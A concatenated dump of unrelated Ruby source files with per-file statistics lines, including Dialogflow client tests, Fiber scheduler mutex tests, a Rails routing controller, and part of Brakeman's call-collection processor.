      assert_equal :dir, dirent.type
      # for a dirent created from scratch, type_id is currently not set until serialization:
      assert_equal 0, dirent.type_id
      dirent.to_s
      assert_equal 1, dirent.type_id
      assert_raises(ArgumentError) { Ole::Storage::Dirent.new ole, :type => :bogus }
    end
  end
end
| 31.77027 | 105 | 0.726641 |
26dd81bde58a587f6531c0a91f8dfea7c93457f7 | 181 | if ENV['COVERAGE']
require 'simplecov'
SimpleCov.start
end
require File.expand_path('../lib/web_translate_it', __dir__)
require 'rspec'
# Minimal stand-in for the I18n gem so specs can call I18n.reload!
# without loading the real library.
class I18n
  def self.reload!; end
end
| 15.083333 | 60 | 0.740331 |
ac09771781aada4917633737db8ab228e3392c31 | 1,423 | require 'rails_helper'
# Presenter copy and signup-step indicator for PIV/CAC setup.
describe PivCacAuthenticationSetupPresenter do
  let(:user) { create(:user) }
  # Second arg toggles "adding an additional MFA method" mode.
  let(:presenter) { described_class.new(user, false, form) }
  let(:form) do
    OpenStruct.new
  end

  describe '#title' do
    let(:expected_title) { t('titles.piv_cac_setup.new') }

    it { expect(presenter.title).to eq expected_title }
  end

  describe '#heading' do
    let(:expected_heading) { t('headings.piv_cac_setup.new') }

    it { expect(presenter.heading).to eq expected_heading }
  end

  describe '#description' do
    let(:expected_description) { t('forms.piv_cac_setup.piv_cac_intro_html') }

    it { expect(presenter.description).to eq expected_description }
  end

  describe 'shows correct step indication' do
    context 'with signed in user adding additional method' do
      let(:user) { build(:user, :signed_up) }
      let(:presenter) { described_class.new(user, true, form) }

      it 'does not show step count' do
        expect(presenter.steps_visible?).to eq false
      end
    end

    context 'with user signing up who has not chosen first option' do
      it 'shows user is on step 3 of 4' do
        expect(presenter.step).to eq '3'
      end
    end

    context 'with user signing up who has chosen first option' do
      let(:user) { build(:user, :with_webauthn) }

      it 'shows user is on step 4 of 4' do
        expect(presenter.step).to eq '4'
      end
    end
  end
end
080840b7350b95df79f2fb56974c4e1869b569fe | 508 | name 'kernel_module'
maintainer 'Chef Software, Inc.'
maintainer_email '[email protected]'
license 'MIT'
description 'Load kernel modules'
version '1.1.4'

# Platform families this cookbook is tested against.
supported_platforms = %w[
  amazon centos debian fedora oracle redhat scientific
  suse opensuse opensuseleap ubuntu
]
supported_platforms.each { |platform| supports platform }

source_url 'https://github.com/chef-cookbooks/kernel_module'
issues_url 'https://github.com/chef-cookbooks/kernel_module/issues'
# chef_version is only available on newer Chef clients.
chef_version '>= 12.7' if respond_to?(:chef_version)
ffefb912b1048b78e4649c8cfc7c24e66d58d978 | 21,077 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/cloud/dialogflow/v2/participant_pb"
require "google/cloud/dialogflow/v2/participant_services_pb"
require "google/cloud/dialogflow/v2/participants"
class ::Google::Cloud::Dialogflow::V2::Participants::ClientTest < Minitest::Test
# Minimal stand-in for Gapic::ServiceStub used by these generated tests.
# Records every call_rpc invocation (count plus whatever the verifier
# block returns per call) and replays the canned response/operation.
class ClientStub
  attr_accessor :call_rpc_count, :requests

  def initialize response, operation, &block
    @canned_response = response
    @canned_operation = operation
    @verifier = block
    @call_rpc_count = 0
    @requests = []
  end

  def call_rpc *args, **kwargs
    @call_rpc_count += 1
    # Record the verifier block's result (nil when no block was given).
    recorded = @verifier.nil? ? nil : @verifier.call(*args, **kwargs)
    @requests.push recorded
    yield @canned_response, @canned_operation if block_given?
    @canned_response
  end
end
# Generated by gapic-generator-ruby (file is marked DO NOT EDIT).
# Exercises create_participant through all five call shapes (hash, kwargs,
# proto, and both with explicit options), verifying request coercion.
def test_create_participant
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::Participant.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  parent = "hello world"
  participant = {}

  create_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :create_participant, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::CreateParticipantRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::Participant), request["participant"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, create_participant_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.create_participant({ parent: parent, participant: participant }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.create_participant parent: parent, participant: participant do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.create_participant ::Google::Cloud::Dialogflow::V2::CreateParticipantRequest.new(parent: parent, participant: participant) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.create_participant({ parent: parent, participant: participant }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.create_participant(::Google::Cloud::Dialogflow::V2::CreateParticipantRequest.new(parent: parent, participant: participant), grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Verify method calls
    assert_equal 5, create_participant_client_stub.call_rpc_count
  end
end
# Generated by gapic-generator-ruby (file is marked DO NOT EDIT).
# Exercises get_participant through all five call shapes. Note the stub's
# block parameter |name, ...| deliberately shadows the outer `name` local.
def test_get_participant
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::Participant.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  name = "hello world"

  get_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :get_participant, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::GetParticipantRequest, request
    assert_equal "hello world", request["name"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, get_participant_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.get_participant({ name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.get_participant name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.get_participant ::Google::Cloud::Dialogflow::V2::GetParticipantRequest.new(name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.get_participant({ name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.get_participant(::Google::Cloud::Dialogflow::V2::GetParticipantRequest.new(name: name), grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Verify method calls
    assert_equal 5, get_participant_client_stub.call_rpc_count
  end
end
# Generated by gapic-generator-ruby (file is marked DO NOT EDIT).
# Exercises list_participants through all five call shapes; the response
# is wrapped in a Gapic::PagedEnumerable, unlike the unary methods above.
def test_list_participants
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::ListParticipantsResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  parent = "hello world"
  page_size = 42
  page_token = "hello world"

  list_participants_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :list_participants, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::ListParticipantsRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal 42, request["page_size"]
    assert_equal "hello world", request["page_token"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, list_participants_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
      assert_kind_of Gapic::PagedEnumerable, response
      assert_equal grpc_response, response.response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.list_participants parent: parent, page_size: page_size, page_token: page_token do |response, operation|
      assert_kind_of Gapic::PagedEnumerable, response
      assert_equal grpc_response, response.response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.list_participants ::Google::Cloud::Dialogflow::V2::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
      assert_kind_of Gapic::PagedEnumerable, response
      assert_equal grpc_response, response.response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
      assert_kind_of Gapic::PagedEnumerable, response
      assert_equal grpc_response, response.response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.list_participants(::Google::Cloud::Dialogflow::V2::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation|
      assert_kind_of Gapic::PagedEnumerable, response
      assert_equal grpc_response, response.response
      assert_equal grpc_operation, operation
    end

    # Verify method calls
    assert_equal 5, list_participants_client_stub.call_rpc_count
  end
end
# Generated by gapic-generator-ruby (file is marked DO NOT EDIT).
# Exercises update_participant through all five call shapes, verifying
# both the participant message and the FieldMask are coerced correctly.
def test_update_participant
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::Participant.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  participant = {}
  update_mask = {}

  update_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :update_participant, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::UpdateParticipantRequest, request
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::Participant), request["participant"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::FieldMask), request["update_mask"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, update_participant_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.update_participant({ participant: participant, update_mask: update_mask }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.update_participant participant: participant, update_mask: update_mask do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.update_participant ::Google::Cloud::Dialogflow::V2::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.update_participant({ participant: participant, update_mask: update_mask }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.update_participant(::Google::Cloud::Dialogflow::V2::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask), grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Verify method calls
    assert_equal 5, update_participant_client_stub.call_rpc_count
  end
end
# Exercises Participants::Client#analyze_content across every supported
# invocation form: request hash, named arguments, request proto, and the
# latter two with an explicit options hash. Each form must reach the stubbed
# RPC as an AnalyzeContentRequest carrying the same field values.
def test_analyze_content
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::AnalyzeContentResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  participant = "hello world"
  text_input = {}
  reply_audio_config = {}
  query_params = {}
  request_id = "hello world"

  # Stub asserts on the decoded request each time the RPC is invoked.
  analyze_content_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :analyze_content, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::AnalyzeContentRequest, request
    assert_equal "hello world", request["participant"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::TextInput), request["text_input"]
    # `input` reports which branch of the request's input group was set;
    # providing text_input must select :text_input.
    assert_equal :text_input, request.input
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::OutputAudioConfig), request["reply_audio_config"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::QueryParameters), request["query_params"]
    assert_equal "hello world", request["request_id"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, analyze_content_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.analyze_content participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.analyze_content ::Google::Cloud::Dialogflow::V2::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.analyze_content(::Google::Cloud::Dialogflow::V2::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id), grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Verify method calls — one RPC per invocation form above.
    assert_equal 5, analyze_content_client_stub.call_rpc_count
  end
end
# Exercises Participants::Client#suggest_articles across every supported
# invocation form (request hash, named arguments, request proto, and with an
# explicit options hash). Each form must reach the stubbed RPC unchanged.
def test_suggest_articles
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::SuggestArticlesResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  parent = "hello world"
  latest_message = "hello world"
  context_size = 42

  # Stub asserts on the decoded request each time the RPC is invoked.
  suggest_articles_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :suggest_articles, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::SuggestArticlesRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal "hello world", request["latest_message"]
    assert_equal 42, request["context_size"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, suggest_articles_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.suggest_articles parent: parent, latest_message: latest_message, context_size: context_size do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.suggest_articles ::Google::Cloud::Dialogflow::V2::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.suggest_articles(::Google::Cloud::Dialogflow::V2::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Verify method calls — one RPC per invocation form above.
    assert_equal 5, suggest_articles_client_stub.call_rpc_count
  end
end
# Exercises Participants::Client#suggest_faq_answers across every supported
# invocation form (request hash, named arguments, request proto, and with an
# explicit options hash). Each form must reach the stubbed RPC unchanged.
def test_suggest_faq_answers
  # Create GRPC objects.
  grpc_response = ::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersResponse.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Create request parameters for a unary method.
  parent = "hello world"
  latest_message = "hello world"
  context_size = 42

  # Stub asserts on the decoded request each time the RPC is invoked.
  suggest_faq_answers_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
    assert_equal :suggest_faq_answers, name
    assert_kind_of ::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersRequest, request
    assert_equal "hello world", request["parent"]
    assert_equal "hello world", request["latest_message"]
    assert_equal 42, request["context_size"]
    refute_nil options
  end

  Gapic::ServiceStub.stub :new, suggest_faq_answers_client_stub do
    # Create client
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
      config.credentials = grpc_channel
    end

    # Use hash object
    client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use named arguments
    client.suggest_faq_answers parent: parent, latest_message: latest_message, context_size: context_size do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object
    client.suggest_faq_answers ::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use hash object with options
    client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Use protobuf object with options
    client.suggest_faq_answers(::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end

    # Verify method calls — one RPC per invocation form above.
    assert_equal 5, suggest_faq_answers_client_stub.call_rpc_count
  end
end
# Verifies that Client#configure yields its Configuration object to the
# given block and also returns that very same object.
def test_configure
  insecure_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure

  client = nil
  yielded_config = nil
  Gapic::ServiceStub.stub :new, nil do
    client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |c|
      c.credentials = insecure_channel
    end
  end

  returned_config = client.configure { |c| yielded_config = c }

  assert_same yielded_config, returned_config
  assert_kind_of ::Google::Cloud::Dialogflow::V2::Participants::Client::Configuration, returned_config
end
end
| 41.819444 | 269 | 0.727238 |
113b1964c4834967b60db8b9ff2f56e80ff09440 | 2,139 |
# Serves the outdoor-navigation pages: a map/index page and a point-to-point
# routing action backed by an A* search over a location graph.
class OutdoorController < ApplicationController
  skip_before_filter :authorize
  include OutdoorHelper

  # Landing page: lists buildings, seeds the Google map with a single fixed
  # campus marker, and provides building names for the search autocomplete.
  def index
    @buildings = Building.order(:name)
    @nearest_locations = Location.all

    # Google Map — coordinates are hard-coded; the Building record only
    # serves as the marker's backing object.
    @users = [Building.first]
    @hash = Gmaps4rails.build_markers(@users) do |user, marker|
      marker.lat 42.366629
      marker.lng -71.259510
      # marker.infowindow user.description
    end

    ## autocomplete
    @building_names = auto_complete(params)
  end

  # Computes a route between the places named in params[:from] and
  # params[:to]. Redirects back to the index with a flash notice whenever
  # either endpoint is missing/unknown, or no path exists between them.
  def routing
    ## Get locations from params
    # .to_s == "" is to test nil or empty
    if params[:from].to_s != "" && params[:to].to_s != "" && params[:from] != params[:to]
      if params[:from].start_with?('(')
        # A "(lat,lng)"-style literal means the user picked an arbitrary point.
        @location_pickup = get_location_pickup(params[:from])
      else
        @building_from = find_building_or_parking_lot(params[:from])
      end
      @building_to = find_building_or_parking_lot(params[:to])
    else
      flash[:notice] = "Sorry, we don't know the place you were looking for."
      redirect_to outdoor_url
      return
    end

    # get the start and end location for the algorithm
    check_graph
    begin
      locations_start = get_locations_start_or_end(@location_pickup, @building_from)
      locations_end = get_locations_start_or_end(@building_to)
      location_start, location_end = get_location_start_and_end(@@astar, locations_start, locations_end)
    rescue RuntimeError
      flash[:notice] = "Sorry, we can't find the place you were looking for."
      redirect_to outdoor_url
      return
    end

    ## run algorithm
    @locations = @@astar.astar(location_start, location_end)
    if @locations.nil?
      flash[:notice] = "Sorry, we can't find a way."
      redirect_to outdoor_url
      return
    end
    @paths = locations_to_paths(@locations)

    ## Google map
    @hash = gmap_build_markers(@locations, @paths)

    ## auto complete
    @building_names = auto_complete(params)

    ##
    @directed_from = "#{params[:from]},,#{params[:to]}"
  end # End of Action

  private

  # Lazily builds the routing graph once per process; the class variable is
  # a deliberate cross-request cache shared by all controller instances.
  def check_graph
    @@astar ||= create_graph
  end
end # End of Controller
| 25.164706 | 104 | 0.661992 |
0842427760ffdf43e54e06b3c055751a90e3167c | 3,804 | # frozen_string_literal: true
require 'test/unit'
require_relative 'scheduler'
# Tests for Mutex, ConditionVariable and Queue behavior when used from
# fibers running under a non-blocking Fiber scheduler (see scheduler.rb).
# The sleeps are deliberate: they force interleavings between fibers and
# between threads, so statement order here is significant.
class TestFiberMutex < Test::Unit::TestCase
  # synchronize inside a scheduled fiber must not flip the fiber into
  # blocking mode.
  def test_mutex_synchronize
    mutex = Mutex.new

    thread = Thread.new do
      scheduler = Scheduler.new
      Fiber.set_scheduler scheduler

      Fiber.schedule do
        assert_not_predicate Fiber, :blocking?

        mutex.synchronize do
          # Holding the mutex must not make the fiber report as blocking.
          assert_not_predicate Fiber, :blocking?
        end
      end
    end

    thread.join
  end

  # Two fibers on one scheduler contending for the same mutex; the second
  # lock must suspend its fiber rather than deadlock the thread.
  def test_mutex_interleaved_locking
    mutex = Mutex.new

    thread = Thread.new do
      scheduler = Scheduler.new
      Fiber.set_scheduler scheduler

      Fiber.schedule do
        mutex.lock
        sleep 0.1
        mutex.unlock
      end

      Fiber.schedule do
        mutex.lock
        sleep 0.1
        mutex.unlock
      end

      scheduler.run
    end

    thread.join
  end

  # A fiber blocked on a mutex held by a plain (non-scheduler) thread must
  # resume once that thread releases the lock.
  def test_mutex_thread
    mutex = Mutex.new
    mutex.lock

    thread = Thread.new do
      scheduler = Scheduler.new
      Fiber.set_scheduler scheduler

      Fiber.schedule do
        mutex.lock
        sleep 0.1
        mutex.unlock
      end

      scheduler.run
    end

    sleep 0.1
    mutex.unlock

    thread.join
  end

  # Fiber#raise delivered to a fiber that is blocked on Mutex#lock must
  # interrupt the lock attempt and must not leave the mutex held.
  def test_mutex_fiber_raise
    mutex = Mutex.new
    ran = false

    main = Thread.new do
      mutex.lock

      thread = Thread.new do
        scheduler = Scheduler.new
        Fiber.set_scheduler scheduler

        f = Fiber.schedule do
          assert_raise_with_message(RuntimeError, "bye") do
            mutex.lock
          end

          ran = true
        end

        Fiber.schedule do
          f.raise "bye"
        end
      end

      thread.join
    end

    main.join # causes mutex to be released

    assert_equal false, mutex.locked?
    assert_equal true, ran
  end

  # ConditionVariable#wait/#signal between two fibers sharing a scheduler.
  def test_condition_variable
    mutex = Mutex.new
    condition = ConditionVariable.new

    signalled = 0

    Thread.new do
      scheduler = Scheduler.new
      Fiber.set_scheduler scheduler

      Fiber.schedule do
        mutex.synchronize do
          3.times do
            condition.wait(mutex)
            signalled += 1
          end
        end
      end

      Fiber.schedule do
        3.times do
          mutex.synchronize do
            condition.signal
          end

          # Yield control so the waiter can wake up before the next signal.
          sleep 0.1
        end
      end

      scheduler.run
    end.join

    assert_equal 3, signalled
  end

  # Producer/consumer over a Queue between two fibers; closing the queue
  # ends the consumer's pop loop (pop returns nil after close).
  def test_queue
    queue = Queue.new
    processed = 0

    thread = Thread.new do
      scheduler = Scheduler.new
      Fiber.set_scheduler scheduler

      Fiber.schedule do
        3.times do |i|
          queue << i
          sleep 0.1
        end

        queue.close
      end

      Fiber.schedule do
        while item = queue.pop
          processed += 1
        end
      end

      scheduler.run
    end

    thread.join

    assert_equal 3, processed
  end

  # Queue#pop on an empty queue must suspend the fiber until another thread
  # pushes, not raise or return early.
  def test_queue_pop_waits
    queue = Queue.new
    running = false

    thread = Thread.new do
      scheduler = Scheduler.new
      Fiber.set_scheduler scheduler

      result = nil
      Fiber.schedule do
        result = queue.pop
      end

      running = true
      scheduler.run
      result
    end

    Thread.pass until running
    sleep 0.1

    queue << :done
    assert_equal :done, thread.value
  end

  # A fiber that parks holding the mutex while the thread then blocks on the
  # same mutex must be detected as a deadlock by the VM (run in a subprocess
  # so the deadlock abort does not kill this test process).
  def test_mutex_deadlock
    error_pattern = /No live threads left. Deadlock\?/

    assert_in_out_err %W[-I#{__dir__} -], <<-RUBY, ['in synchronize'], error_pattern, success: false
      require 'scheduler'
      mutex = Mutex.new

      thread = Thread.new do
        scheduler = Scheduler.new
        Fiber.set_scheduler scheduler

        Fiber.schedule do
          mutex.synchronize do
            puts 'in synchronize'
            Fiber.yield
          end
        end

        mutex.lock
      end

      thread.join
    RUBY
  end
end
| 17.21267 | 100 | 0.590694 |
7a7bc9b27d24f95bfdf8f57f6b33a4bc5eb013a2 | 50 | json.array! @alerts, partial: 'alert', as: :alert
| 25 | 49 | 0.68 |
03590648ddfd16c13143119efd532385512ab928 | 4,538 | require 'brakeman/processors/lib/basic_processor'
# Walks a Sexp tree and records every method call it finds into `calls`,
# Brakeman's call cache. Each entry is a hash with the call's target,
# method name, original Sexp, nesting flag, and source location. Render
# calls, backticks, dynamic symbols/regexes and attribute assignments are
# also recorded so later checks can look them up quickly.
class Brakeman::FindAllCalls < Brakeman::BasicProcessor
  attr_reader :calls

  def initialize tracker
    super
    @current_class = nil
    @current_method = nil
    @in_target = false     # true while processing the target side of a call chain
    @calls = []
    @cache = {}            # memoized location hashes, keyed by class/method/file
  end

  #Process the given source. Provide either class and method being searched
  #or the template. These names are used when reporting results.
  def process_source exp, opts
    @current_class = opts[:class]
    @current_method = opts[:method]
    @current_template = opts[:template]
    @current_file = opts[:file]
    process exp
  end

  #Process body of method
  def process_methdef exp
    process_all exp.body
  end

  #Process body of method
  def process_selfdef exp
    process_all exp.body
  end

  #Process body of block
  def process_rlist exp
    process_all exp
  end

  def process_call exp
    @calls << create_call_hash(exp)
    exp
  end

  def process_call_with_block exp
    call = exp.block_call

    if call.node_type == :call
      call_hash = create_call_hash(call)

      # Attach the block and its arguments to the recorded call.
      call_hash[:block] = exp.block
      call_hash[:block_args] = exp.block_args

      @calls << call_hash

      process exp.block
    else
      #Probably a :render call with block
      process call
      process exp.block
    end

    exp
  end

  alias process_iter process_call_with_block

  #Calls to render() are converted to s(:render, ...) but we would
  #like them in the call cache still for speed
  def process_render exp
    process exp.last if sexp? exp.last

    @calls << { :target => nil,
                :method => :render,
                :call => exp,
                :nested => false,
                :location => make_location }

    exp
  end

  #Technically, `` is call to Kernel#`
  #But we just need them in the call cache for speed
  def process_dxstr exp
    process exp.last if sexp? exp.last

    @calls << { :target => nil,
                :method => :`,
                :call => exp,
                :nested => false,
                :location => make_location }

    exp
  end

  #:"string" is equivalent to "string".to_sym
  def process_dsym exp
    exp.each { |arg| process arg if sexp? arg }

    @calls << { :target => nil,
                :method => :literal_to_sym,
                :call => exp,
                :nested => false,
                :location => make_location }

    exp
  end

  # Process a dynamic regex like a call
  def process_dregx exp
    exp.each { |arg| process arg if sexp? arg }

    @calls << { :target => nil,
                :method => :brakeman_regex_interp,
                :call => exp,
                :nested => false,
                :location => make_location }

    exp
  end

  #Process an assignment like a call
  def process_attrasgn exp
    process_call exp
  end

  private

  #Gets the target of a call as a Symbol
  #if possible
  def get_target exp
    if sexp? exp
      case exp.node_type
      when :ivar, :lvar, :const, :lit
        exp.value
      when :true, :false
        exp[0]
      when :colon2
        class_name exp
      when :self
        @current_class || @current_module || nil
      else
        # Not reducible to a simple name; keep the Sexp itself.
        exp
      end
    else
      exp
    end
  end

  #Returns method chain as an array
  #For example, User.human.alive.all would return [:User, :human, :alive, :all]
  def get_chain call
    if node_type? call, :call, :attrasgn
      get_chain(call.target) + [call.method]
    elsif call.nil?
      []
    else
      [get_target(call)]
    end
  end

  # Builds (and memoizes) the location hash recorded with each call: either
  # a :template location or a :class/:method location, depending on what
  # process_source was given.
  def make_location
    if @current_template
      key = [@current_template, @current_file]
      cached = @cache[key]
      return cached if cached

      @cache[key] = { :type => :template,
        :template => @current_template,
        :file => @current_file }
    else
      key = [@current_class, @current_method, @current_file]
      cached = @cache[key]
